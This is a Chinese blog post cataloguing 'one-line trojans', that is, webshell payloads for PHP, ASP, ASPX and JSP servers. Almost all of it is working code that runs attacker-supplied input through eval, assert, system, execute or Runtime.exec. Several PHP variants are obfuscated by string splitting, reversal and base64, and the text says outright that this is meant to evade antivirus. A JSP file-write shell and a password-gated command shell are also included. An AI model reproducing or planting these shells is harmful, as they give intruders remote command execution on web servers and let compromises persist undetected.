常见一句话木马
php:
<?php @eval($_POST['attack' ]);?>
<?php eval($_POST[1]);?>
<script language="php">@eval($_POST['cmd'])</script>
<?=eval($_POST['cmd']);
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST[1]);?>
<?php ($_=@$_GET[1]).@$_($_POST[1])?>
<?php eval_r($_POST[1])?>
<?php @eval_r($_POST[1])?>
<?php assert($_POST[1]);?>
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>
<script language="php">@eval_r($_POST[sb])</script>
<?=eval($_POST['cmd']);
<?php @eval($_POST['r00ts']);?>
<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system($_REQUEST[1]);?>
<?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['password']);?>
<?php ($_=@$_GET[s]).@$_($_POST[hihack]) ?>
<php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[hihack]); ?>
<?php $a = "assert"; $a(@$_POST['shell']); ?>
<?php $a="TR"."Es"."sA"; $b=strtolower($a); $c=strrev($b); @$c($_POST['shell']); ?>
<?php $a="AssERT"; $b=strtolower($a); @$b($_POST['shell']); ?>
<?php $bb="assert"; $a='bb';$$aa($_POST['shell']);?>
<?php function fun($a){ @eval($a); } @fun($_POST['shell']); ?>
<?php $fun = create_function('',$_POST['shell']);$fun();?>
<?php @call_user_func(assert,$_POST['shell']); ?>
<?php $a=base64_decode("YXNzZXJ0"); @a($_POST['shell']); ?>
<?php function fun(){ return $_POST['shell']; } @preg_replace("/test/e", fun(), "test123"); ?>
<?php $str="a=eval";parse_str($str);$a($_POST['shell']);?>
<?php $a = str_replace("test", "", "astestsert"); $a($_POST['shell']);?>
asp:
<%eval request ("mbg")%>
<%execute request("c")%>
<%execute(request("c"))%>
<%ExecuteGlobal request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<%eval(Request.Item["c"],"unsafe");%>
<%eval(request("c")):response.end%>
<%execute request("c")%><%<%loop<%:%>
<%<%loop<%:%><%execute request("c")%>
<%execute request("c")<%loop<%:%>
<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>
<%eval request(chr(35))%>
<%eval(Request.Item["r00ts"],”unsafe”);%>
<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>
<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request(“class”)%><%execute request(“class”)'<% loop <%:%>
<%dy=request("c")%><%Eval(dy)%>
<script language=VBScript runat=server>execute request("c")</script>
<script language=vbs runat=server>eval(request("c"))</script>
<script language=vbs runat=server>eval_r(request("c"))</script>
aspx:
<%@ Page Language="Jscript"%> <%eval(Request.Item["mbg"],"unsafe");%>\
<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); </script> 密码是webadmin
<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>
jsp:
https://blog.csdn.net/whatday/article/details/107778872
https://xw.qq.com/cmsid/20220421A000ZC00
https://github.com/wjaxx/JSP-Webshells/tree/master/jsp
其他类型的webshell容易免杀的一个主要原因是有eval函数,能够把我们的加密几层后的payload进行解密然后用eval执行,从而绕过杀软的检测。
然而由于JSP的语法没有所谓的eval函数,不像php等语言那么灵活,变形困难,所以JSP的免杀马比较少,相关的文章也比较少。
而且都比较长
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>
<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
jsp webshell命令执行基本只有两条命令核心(1)Runtime.getRuntime().exec( (2)ProcessBuilder
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探